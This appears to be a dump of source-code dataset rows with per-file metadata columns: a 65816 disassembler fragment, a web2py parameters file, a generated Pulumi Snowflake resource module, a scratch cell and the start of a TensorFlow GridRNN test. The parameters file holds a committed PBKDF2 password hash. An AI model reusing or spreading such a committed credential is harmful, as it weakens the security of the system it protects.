        'siy': (' (%s,S),Y', '$%s'),
    }

    # Modes with a two-byte operand at pc+1 (instruction length 3).
    # mode -> operand template; default label is always '$' + addrFmt.
    _WORD_MODES = {
        'abs': ' %s',
        'abx': ' %s,X',
        'aby': ' %s,Y',
        'ind': ' (%s)',
        'iax': ' (%s,X)',
        # 65816-specific absolute-indirect and "special" modes
        'abi': ' (%s)',
        'aix': ' (%s,X)',
        'ail': ' [%s]',
        'ska': ' %s',
        'spc': ' %s',
    }

    # Modes with a three-byte (long) operand at pc+1 (instruction length 4).
    _LONG_MODES = {
        'abl': ' %s',
        'alx': ' %s,X',
    }

    def __init__(self, mpu, address_parser=None):
        super().__init__(mpu, address_parser)

    def instruction_at(self, pc):
        """ Disassemble the instruction at PC and return a tuple
        containing (instruction byte count, human readable text)
        """
        instruction = self._mpu.ByteAt(pc)
        disasm, addressing = self._mpu.disassemble[instruction]

        if addressing in self._BYTE_MODES:
            template, default = self._BYTE_MODES[addressing]
            operand = self._mpu.ByteAt(pc + 1)
            label = self._address_parser.label_for(
                operand, default % (self.byteFmt % operand))
            disasm += template % label
            length = 2
        elif addressing in self._WORD_MODES:
            operand = self._mpu.WordAt(pc + 1)
            label = self._address_parser.label_for(
                operand, '$' + self.addrFmt % operand)
            disasm += self._WORD_MODES[addressing] % label
            length = 3
        elif addressing in self._LONG_MODES:
            operand = self._mpu.LongAt(pc + 1)
            label = self._address_parser.label_for(
                operand, '$' + self.addrFmt % operand)
            disasm += self._LONG_MODES[addressing] % label
            length = 4
        elif addressing == 'acc':
            disasm += ' A'
            length = 1
        elif addressing in ('imp', 'stk'):
            # Implied / stack modes carry no operand text.
            length = 1
        elif addressing == 'imm':
            # Immediate operand width follows the MS (memory select) flag:
            # one byte when set, one word when clear.
            if self._mpu.p & self._mpu.MS:
                disasm += ' #$' + self.byteFmt % self._mpu.ByteAt(pc + 1)
                length = 2
            else:
                disasm += ' #$' + self.addrFmt % self._mpu.WordAt(pc + 1)
                length = 3
        elif addressing == 'rel' or addressing == 'pcr':
            # One-byte PC-relative branch.
            disasm += ' ' + self._relative_target(
                self._mpu.ByteAt(pc + 1), pc + 2)
            length = 2
        elif addressing == 'prl':
            # Two-byte PC-relative branch.
            # *** CHECK *** (original note): the sign test in
            # _relative_target still uses byteWidth/byteMask even though the
            # operand here is a word; original behavior is preserved as-is.
            disasm += ' ' + self._relative_target(
                self._mpu.WordAt(pc + 1), pc + 3)
            length = 3
        elif addressing == 'blk':
            # Block move: two one-byte bank operands.
            source = self._mpu.ByteAt(pc + 1)
            dest = self._mpu.ByteAt(pc + 2)
            source_bank = self._address_parser.label_for(
                source, '$' + self.byteFmt % source)
            dest_bank = self._address_parser.label_for(
                dest, '$' + self.byteFmt % dest)
            disasm += ' %s,%s' % (source_bank, dest_bank)
            length = 3
        elif addressing == 'ski':
            byte = self._mpu.ByteAt(pc + 1)
            # *** TODO: choose between these according to ca65 syntax ***
            # disasm += ' #$' + self.byteFmt % byte
            disasm += ' $' + self.byteFmt % byte
            length = 2
        else:
            raise NotImplementedError("Addressing mode: %r" % addressing)
        return (length, disasm)

    def _relative_target(self, opv, base):
        """Resolve a PC-relative operand *opv* against *base* (the address
        of the next instruction) and return its label or hex form."""
        targ = base
        if opv & (1 << (self.byteWidth - 1)):
            # Negative displacement: undo the two's-complement encoding.
            targ -= (opv ^ self.byteMask) + 1
        else:
            targ += opv
        targ &= self.addrMask
        return self._address_parser.label_for(
            targ, '$' + self.addrFmt % targ)
| 37.162712
| 83
| 0.512816
| 1,170
| 10,963
| 4.533333
| 0.108547
| 0.10181
| 0.158371
| 0.13273
| 0.808069
| 0.79902
| 0.769985
| 0.757353
| 0.729638
| 0.729638
| 0
| 0.013523
| 0.372708
| 10,963
| 294
| 84
| 37.289116
| 0.757743
| 0.03302
| 0
| 0.705882
| 0
| 0
| 0.030274
| 0
| 0
| 0
| 0
| 0.003401
| 0
| 1
| 0.008403
| false
| 0
| 0.004202
| 0
| 0.021008
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83655b40f56131aad8e6bb4be75ee99d21c38071
| 92
|
py
|
Python
|
parameters_8000.py
|
ectom/CMPS183
|
c603d7ad95cfa92ee32c62fe35ad07f0c0828772
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_8000.py
|
ectom/CMPS183
|
c603d7ad95cfa92ee32c62fe35ad07f0c0828772
|
[
"BSD-3-Clause"
] | null | null | null |
parameters_8000.py
|
ectom/CMPS183
|
c603d7ad95cfa92ee32c62fe35ad07f0c0828772
|
[
"BSD-3-Clause"
] | null | null | null |
# NOTE(review): committed credential. The value looks like a web2py
# parameters-file admin password hash (pbkdf2(iterations,keylen,digest)$salt$hash)
# — presumably generated by the framework; verify against the deployment.
# Secrets should not live in version control: rotate this password and keep
# the file out of the repository (e.g. via .gitignore).
password="pbkdf2(1000,20,sha512)$80cc21effc349862$0cc98f172b0664e5c8f64e43a1eb236d5e7ff5bc"
| 46
| 91
| 0.891304
| 7
| 92
| 11.714286
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.472527
| 0.01087
| 92
| 1
| 92
| 92
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0.869565
| 0.869565
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
55ca1dd8849df107145148894a8334a427c53a43
| 22,629
|
py
|
Python
|
sdk/python/pulumi_snowflake/materialized_view.py
|
Hacker0x01/pulumi-snowflake
|
f6ebcf2c3f73b103a7c2001fae231998ce1323b2
|
[
"ECL-2.0",
"Apache-2.0"
] | 3
|
2021-07-01T17:03:33.000Z
|
2022-03-01T19:29:04.000Z
|
sdk/python/pulumi_snowflake/materialized_view.py
|
Hacker0x01/pulumi-snowflake
|
f6ebcf2c3f73b103a7c2001fae231998ce1323b2
|
[
"ECL-2.0",
"Apache-2.0"
] | 102
|
2021-07-14T13:12:58.000Z
|
2022-03-31T18:34:04.000Z
|
sdk/python/pulumi_snowflake/materialized_view.py
|
Hacker0x01/pulumi-snowflake
|
f6ebcf2c3f73b103a7c2001fae231998ce1323b2
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2022-03-25T07:24:45.000Z
|
2022-03-25T07:24:45.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['MaterializedViewArgs', 'MaterializedView']
@pulumi.input_type
class MaterializedViewArgs:
    """Input argument bundle used to construct a ``MaterializedView`` resource.

    Auto-generated by the Pulumi Terraform Bridge (tfgen); do not edit by hand.
    Required inputs: database, schema, statement, warehouse.
    """
    def __init__(__self__, *,
                 database: pulumi.Input[str],
                 schema: pulumi.Input[str],
                 statement: pulumi.Input[str],
                 warehouse: pulumi.Input[str],
                 comment: Optional[pulumi.Input[str]] = None,
                 is_secure: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 or_replace: Optional[pulumi.Input[bool]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input['MaterializedViewTagArgs']]]] = None):
        """
        The set of arguments for constructing a MaterializedView resource.
        :param pulumi.Input[str] database: The database in which to create the view. Don't use the | character.
        :param pulumi.Input[str] schema: The schema in which to create the view. Don't use the | character.
        :param pulumi.Input[str] statement: Specifies the query used to create the view.
        :param pulumi.Input[str] warehouse: The warehouse name.
        :param pulumi.Input[str] comment: Specifies a comment for the view.
        :param pulumi.Input[bool] is_secure: Specifies that the view is secure.
        :param pulumi.Input[str] name: Specifies the identifier for the view; must be unique for the schema in which the view is created.
        :param pulumi.Input[bool] or_replace: Overwrites the View if it exists.
        :param pulumi.Input[Sequence[pulumi.Input['MaterializedViewTagArgs']]] tags: Definitions of a tag to associate with the resource.
        """
        pulumi.set(__self__, "database", database)
        pulumi.set(__self__, "schema", schema)
        pulumi.set(__self__, "statement", statement)
        pulumi.set(__self__, "warehouse", warehouse)
        if comment is not None:
            pulumi.set(__self__, "comment", comment)
        if is_secure is not None:
            pulumi.set(__self__, "is_secure", is_secure)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if or_replace is not None:
            pulumi.set(__self__, "or_replace", or_replace)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
    @property
    @pulumi.getter
    def database(self) -> pulumi.Input[str]:
        """
        The database in which to create the view. Don't use the | character.
        """
        return pulumi.get(self, "database")
    @database.setter
    def database(self, value: pulumi.Input[str]):
        pulumi.set(self, "database", value)
    @property
    @pulumi.getter
    def schema(self) -> pulumi.Input[str]:
        """
        The schema in which to create the view. Don't use the | character.
        """
        return pulumi.get(self, "schema")
    @schema.setter
    def schema(self, value: pulumi.Input[str]):
        pulumi.set(self, "schema", value)
    @property
    @pulumi.getter
    def statement(self) -> pulumi.Input[str]:
        """
        Specifies the query used to create the view.
        """
        return pulumi.get(self, "statement")
    @statement.setter
    def statement(self, value: pulumi.Input[str]):
        pulumi.set(self, "statement", value)
    @property
    @pulumi.getter
    def warehouse(self) -> pulumi.Input[str]:
        """
        The warehouse name.
        """
        return pulumi.get(self, "warehouse")
    @warehouse.setter
    def warehouse(self, value: pulumi.Input[str]):
        pulumi.set(self, "warehouse", value)
    @property
    @pulumi.getter
    def comment(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies a comment for the view.
        """
        return pulumi.get(self, "comment")
    @comment.setter
    def comment(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "comment", value)
    @property
    @pulumi.getter(name="isSecure")
    def is_secure(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies that the view is secure.
        """
        return pulumi.get(self, "is_secure")
    @is_secure.setter
    def is_secure(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_secure", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the identifier for the view; must be unique for the schema in which the view is created.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter(name="orReplace")
    def or_replace(self) -> Optional[pulumi.Input[bool]]:
        """
        Overwrites the View if it exists.
        """
        return pulumi.get(self, "or_replace")
    @or_replace.setter
    def or_replace(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "or_replace", value)
    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MaterializedViewTagArgs']]]]:
        """
        Definitions of a tag to associate with the resource.
        """
        return pulumi.get(self, "tags")
    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MaterializedViewTagArgs']]]]):
        pulumi.set(self, "tags", value)
@pulumi.input_type
class _MaterializedViewState:
    """State input bundle used to look up / filter existing MaterializedView
    resources; every field is optional.

    Auto-generated by the Pulumi Terraform Bridge (tfgen); do not edit by hand.
    """
    def __init__(__self__, *,
                 comment: Optional[pulumi.Input[str]] = None,
                 database: Optional[pulumi.Input[str]] = None,
                 is_secure: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 or_replace: Optional[pulumi.Input[bool]] = None,
                 schema: Optional[pulumi.Input[str]] = None,
                 statement: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input['MaterializedViewTagArgs']]]] = None,
                 warehouse: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering MaterializedView resources.
        :param pulumi.Input[str] comment: Specifies a comment for the view.
        :param pulumi.Input[str] database: The database in which to create the view. Don't use the | character.
        :param pulumi.Input[bool] is_secure: Specifies that the view is secure.
        :param pulumi.Input[str] name: Specifies the identifier for the view; must be unique for the schema in which the view is created.
        :param pulumi.Input[bool] or_replace: Overwrites the View if it exists.
        :param pulumi.Input[str] schema: The schema in which to create the view. Don't use the | character.
        :param pulumi.Input[str] statement: Specifies the query used to create the view.
        :param pulumi.Input[Sequence[pulumi.Input['MaterializedViewTagArgs']]] tags: Definitions of a tag to associate with the resource.
        :param pulumi.Input[str] warehouse: The warehouse name.
        """
        if comment is not None:
            pulumi.set(__self__, "comment", comment)
        if database is not None:
            pulumi.set(__self__, "database", database)
        if is_secure is not None:
            pulumi.set(__self__, "is_secure", is_secure)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if or_replace is not None:
            pulumi.set(__self__, "or_replace", or_replace)
        if schema is not None:
            pulumi.set(__self__, "schema", schema)
        if statement is not None:
            pulumi.set(__self__, "statement", statement)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if warehouse is not None:
            pulumi.set(__self__, "warehouse", warehouse)
    @property
    @pulumi.getter
    def comment(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies a comment for the view.
        """
        return pulumi.get(self, "comment")
    @comment.setter
    def comment(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "comment", value)
    @property
    @pulumi.getter
    def database(self) -> Optional[pulumi.Input[str]]:
        """
        The database in which to create the view. Don't use the | character.
        """
        return pulumi.get(self, "database")
    @database.setter
    def database(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "database", value)
    @property
    @pulumi.getter(name="isSecure")
    def is_secure(self) -> Optional[pulumi.Input[bool]]:
        """
        Specifies that the view is secure.
        """
        return pulumi.get(self, "is_secure")
    @is_secure.setter
    def is_secure(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "is_secure", value)
    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the identifier for the view; must be unique for the schema in which the view is created.
        """
        return pulumi.get(self, "name")
    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)
    @property
    @pulumi.getter(name="orReplace")
    def or_replace(self) -> Optional[pulumi.Input[bool]]:
        """
        Overwrites the View if it exists.
        """
        return pulumi.get(self, "or_replace")
    @or_replace.setter
    def or_replace(self, value: Optional[pulumi.Input[bool]]):
        pulumi.set(self, "or_replace", value)
    @property
    @pulumi.getter
    def schema(self) -> Optional[pulumi.Input[str]]:
        """
        The schema in which to create the view. Don't use the | character.
        """
        return pulumi.get(self, "schema")
    @schema.setter
    def schema(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "schema", value)
    @property
    @pulumi.getter
    def statement(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the query used to create the view.
        """
        return pulumi.get(self, "statement")
    @statement.setter
    def statement(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "statement", value)
    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['MaterializedViewTagArgs']]]]:
        """
        Definitions of a tag to associate with the resource.
        """
        return pulumi.get(self, "tags")
    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['MaterializedViewTagArgs']]]]):
        pulumi.set(self, "tags", value)
    @property
    @pulumi.getter
    def warehouse(self) -> Optional[pulumi.Input[str]]:
        """
        The warehouse name.
        """
        return pulumi.get(self, "warehouse")
    @warehouse.setter
    def warehouse(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "warehouse", value)
class MaterializedView(pulumi.CustomResource):
    """A Snowflake materialized view managed as a Pulumi resource.

    Auto-generated by the Pulumi Terraform Bridge (tfgen); do not edit by hand.
    """
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 comment: Optional[pulumi.Input[str]] = None,
                 database: Optional[pulumi.Input[str]] = None,
                 is_secure: Optional[pulumi.Input[bool]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 or_replace: Optional[pulumi.Input[bool]] = None,
                 schema: Optional[pulumi.Input[str]] = None,
                 statement: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MaterializedViewTagArgs']]]]] = None,
                 warehouse: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """
        ## Example Usage
        ```python
        import pulumi
        import pulumi_snowflake as snowflake
        view = snowflake.MaterializedView("view",
            database="db",
            schema="schema",
            warehouse="warehouse",
            comment="comment",
            statement="select * from foo;\n",
            or_replace=False,
            is_secure=False)
        ```
        ## Import
        # format is database name | schema name | view name
        ```sh
        $ pulumi import snowflake:index/materializedView:MaterializedView example 'dbName|schemaName|viewName'
        ```
        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] comment: Specifies a comment for the view.
        :param pulumi.Input[str] database: The database in which to create the view. Don't use the | character.
        :param pulumi.Input[bool] is_secure: Specifies that the view is secure.
        :param pulumi.Input[str] name: Specifies the identifier for the view; must be unique for the schema in which the view is created.
        :param pulumi.Input[bool] or_replace: Overwrites the View if it exists.
        :param pulumi.Input[str] schema: The schema in which to create the view. Don't use the | character.
        :param pulumi.Input[str] statement: Specifies the query used to create the view.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MaterializedViewTagArgs']]]] tags: Definitions of a tag to associate with the resource.
        :param pulumi.Input[str] warehouse: The warehouse name.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: MaterializedViewArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        ## Example Usage
        ```python
        import pulumi
        import pulumi_snowflake as snowflake
        view = snowflake.MaterializedView("view",
            database="db",
            schema="schema",
            warehouse="warehouse",
            comment="comment",
            statement="select * from foo;\n",
            or_replace=False,
            is_secure=False)
        ```
        ## Import
        # format is database name | schema name | view name
        ```sh
        $ pulumi import snowflake:index/materializedView:MaterializedView example 'dbName|schemaName|viewName'
        ```
        :param str resource_name: The name of the resource.
        :param MaterializedViewArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two typed overloads above, then delegate to
        # _internal_init with a flattened keyword-argument form.
        resource_args, opts = _utilities.get_resource_args_opts(MaterializedViewArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       comment: Optional[pulumi.Input[str]] = None,
                       database: Optional[pulumi.Input[str]] = None,
                       is_secure: Optional[pulumi.Input[bool]] = None,
                       name: Optional[pulumi.Input[str]] = None,
                       or_replace: Optional[pulumi.Input[bool]] = None,
                       schema: Optional[pulumi.Input[str]] = None,
                       statement: Optional[pulumi.Input[str]] = None,
                       tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MaterializedViewTagArgs']]]]] = None,
                       warehouse: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        # Shared implementation behind both __init__ overloads: validates
        # options, enforces required properties, and registers the resource.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            # Creating a new resource (not adopting an existing one by id).
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = MaterializedViewArgs.__new__(MaterializedViewArgs)
            __props__.__dict__["comment"] = comment
            if database is None and not opts.urn:
                raise TypeError("Missing required property 'database'")
            __props__.__dict__["database"] = database
            __props__.__dict__["is_secure"] = is_secure
            __props__.__dict__["name"] = name
            __props__.__dict__["or_replace"] = or_replace
            if schema is None and not opts.urn:
                raise TypeError("Missing required property 'schema'")
            __props__.__dict__["schema"] = schema
            if statement is None and not opts.urn:
                raise TypeError("Missing required property 'statement'")
            __props__.__dict__["statement"] = statement
            __props__.__dict__["tags"] = tags
            if warehouse is None and not opts.urn:
                raise TypeError("Missing required property 'warehouse'")
            __props__.__dict__["warehouse"] = warehouse
        super(MaterializedView, __self__).__init__(
            'snowflake:index/materializedView:MaterializedView',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None,
            comment: Optional[pulumi.Input[str]] = None,
            database: Optional[pulumi.Input[str]] = None,
            is_secure: Optional[pulumi.Input[bool]] = None,
            name: Optional[pulumi.Input[str]] = None,
            or_replace: Optional[pulumi.Input[bool]] = None,
            schema: Optional[pulumi.Input[str]] = None,
            statement: Optional[pulumi.Input[str]] = None,
            tags: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MaterializedViewTagArgs']]]]] = None,
            warehouse: Optional[pulumi.Input[str]] = None) -> 'MaterializedView':
        """
        Get an existing MaterializedView resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.
        :param str resource_name: The unique name of the resulting resource.
        :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] comment: Specifies a comment for the view.
        :param pulumi.Input[str] database: The database in which to create the view. Don't use the | character.
        :param pulumi.Input[bool] is_secure: Specifies that the view is secure.
        :param pulumi.Input[str] name: Specifies the identifier for the view; must be unique for the schema in which the view is created.
        :param pulumi.Input[bool] or_replace: Overwrites the View if it exists.
        :param pulumi.Input[str] schema: The schema in which to create the view. Don't use the | character.
        :param pulumi.Input[str] statement: Specifies the query used to create the view.
        :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['MaterializedViewTagArgs']]]] tags: Definitions of a tag to associate with the resource.
        :param pulumi.Input[str] warehouse: The warehouse name.
        """
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
        __props__ = _MaterializedViewState.__new__(_MaterializedViewState)
        __props__.__dict__["comment"] = comment
        __props__.__dict__["database"] = database
        __props__.__dict__["is_secure"] = is_secure
        __props__.__dict__["name"] = name
        __props__.__dict__["or_replace"] = or_replace
        __props__.__dict__["schema"] = schema
        __props__.__dict__["statement"] = statement
        __props__.__dict__["tags"] = tags
        __props__.__dict__["warehouse"] = warehouse
        return MaterializedView(resource_name, opts=opts, __props__=__props__)
    @property
    @pulumi.getter
    def comment(self) -> pulumi.Output[Optional[str]]:
        """
        Specifies a comment for the view.
        """
        return pulumi.get(self, "comment")
    @property
    @pulumi.getter
    def database(self) -> pulumi.Output[str]:
        """
        The database in which to create the view. Don't use the | character.
        """
        return pulumi.get(self, "database")
    @property
    @pulumi.getter(name="isSecure")
    def is_secure(self) -> pulumi.Output[Optional[bool]]:
        """
        Specifies that the view is secure.
        """
        return pulumi.get(self, "is_secure")
    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """
        Specifies the identifier for the view; must be unique for the schema in which the view is created.
        """
        return pulumi.get(self, "name")
    @property
    @pulumi.getter(name="orReplace")
    def or_replace(self) -> pulumi.Output[Optional[bool]]:
        """
        Overwrites the View if it exists.
        """
        return pulumi.get(self, "or_replace")
    @property
    @pulumi.getter
    def schema(self) -> pulumi.Output[str]:
        """
        The schema in which to create the view. Don't use the | character.
        """
        return pulumi.get(self, "schema")
    @property
    @pulumi.getter
    def statement(self) -> pulumi.Output[str]:
        """
        Specifies the query used to create the view.
        """
        return pulumi.get(self, "statement")
    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Sequence['outputs.MaterializedViewTag']]]:
        """
        Definitions of a tag to associate with the resource.
        """
        return pulumi.get(self, "tags")
    @property
    @pulumi.getter
    def warehouse(self) -> pulumi.Output[str]:
        """
        The warehouse name.
        """
        return pulumi.get(self, "warehouse")
| 39.423345
| 155
| 0.620973
| 2,597
| 22,629
| 5.245283
| 0.066615
| 0.108207
| 0.08222
| 0.067831
| 0.852665
| 0.817942
| 0.799883
| 0.772427
| 0.75356
| 0.738731
| 0
| 0.000061
| 0.269698
| 22,629
| 573
| 156
| 39.492147
| 0.824216
| 0.310089
| 0
| 0.734568
| 1
| 0
| 0.087404
| 0.01931
| 0
| 0
| 0
| 0
| 0
| 1
| 0.160494
| false
| 0.003086
| 0.021605
| 0
| 0.277778
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
55ca41d1fc28484f631b583b38c98fb53b7752fd
| 22
|
py
|
Python
|
fundamentos/teste.py
|
C3As/COD3R-Curso-Python
|
13e778108388e290da433db991838c307750a337
|
[
"MIT"
] | null | null | null |
fundamentos/teste.py
|
C3As/COD3R-Curso-Python
|
13e778108388e290da433db991838c307750a337
|
[
"MIT"
] | null | null | null |
fundamentos/teste.py
|
C3As/COD3R-Curso-Python
|
13e778108388e290da433db991838c307750a337
|
[
"MIT"
] | null | null | null |
#%%
# Interactive (Jupyter/VS Code) cell: scratch arithmetic with no assignments.
# The expression values (6 and 3.333...) are only visible when the cell is
# executed in an interactive session; running the file as a script prints nothing.
2 * 3
10 / 3
# %%
| 4.4
| 6
| 0.227273
| 4
| 22
| 1.25
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.384615
| 0.409091
| 22
| 4
| 7
| 5.5
| 0
| 0.227273
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
363a3c9b4a59eb8f769b16a11a3ade0643358c64
| 30,186
|
py
|
Python
|
tensorflow/contrib/grid_rnn/python/kernel_tests/grid_rnn_test.py
|
PaulWang1905/tensorflow
|
ebf12d22b4801fb8dab5034cc94562bf7cc33fa0
|
[
"Apache-2.0"
] | 848
|
2019-12-03T00:16:17.000Z
|
2022-03-31T22:53:17.000Z
|
tensorflow/contrib/grid_rnn/python/kernel_tests/grid_rnn_test.py
|
PaulWang1905/tensorflow
|
ebf12d22b4801fb8dab5034cc94562bf7cc33fa0
|
[
"Apache-2.0"
] | 656
|
2019-12-03T00:48:46.000Z
|
2022-03-31T18:41:54.000Z
|
tensorflow/contrib/grid_rnn/python/kernel_tests/grid_rnn_test.py
|
PaulWang1905/tensorflow
|
ebf12d22b4801fb8dab5034cc94562bf7cc33fa0
|
[
"Apache-2.0"
] | 506
|
2019-12-03T00:46:26.000Z
|
2022-03-30T10:34:56.000Z
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for GridRNN cells."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.contrib.grid_rnn.python.ops import grid_rnn_cell
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import rnn
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
class GridRNNCellTest(test.TestCase):
  """Tests for the GridRNN cell variants in tf.contrib.grid_rnn.

  Each test builds a small cell, checks static output/state shapes, then runs
  one (or more) steps with fixed inputs and compares against precomputed
  reference values (weights are constant-initialized, so outputs are
  deterministic).
  """

  def testGrid2BasicLSTMCell(self):
    """2D BasicLSTM grid: shapes, one-step values, and variable reuse."""
    # NOTE: cached_session replaces the deprecated test_session used elsewhere
    # in older revisions; behavior (CPU-only session) is unchanged.
    with self.cached_session(use_gpu=False) as sess:
      with variable_scope.variable_scope(
          'root', initializer=init_ops.constant_initializer(0.2)) as root_scope:
        x = array_ops.zeros([1, 3])
        m = ((array_ops.zeros([1, 2]), array_ops.zeros([1, 2])),
             (array_ops.zeros([1, 2]), array_ops.zeros([1, 2])))
        cell = grid_rnn_cell.Grid2BasicLSTMCell(2)
        self.assertEqual(cell.state_size, ((2, 2), (2, 2)))

        g, s = cell(x, m)
        self.assertEqual(g[0].get_shape(), (1, 2))
        self.assertEqual(s[0].c.get_shape(), (1, 2))
        self.assertEqual(s[0].h.get_shape(), (1, 2))
        self.assertEqual(s[1].c.get_shape(), (1, 2))
        self.assertEqual(s[1].h.get_shape(), (1, 2))

        sess.run([variables.global_variables_initializer()])
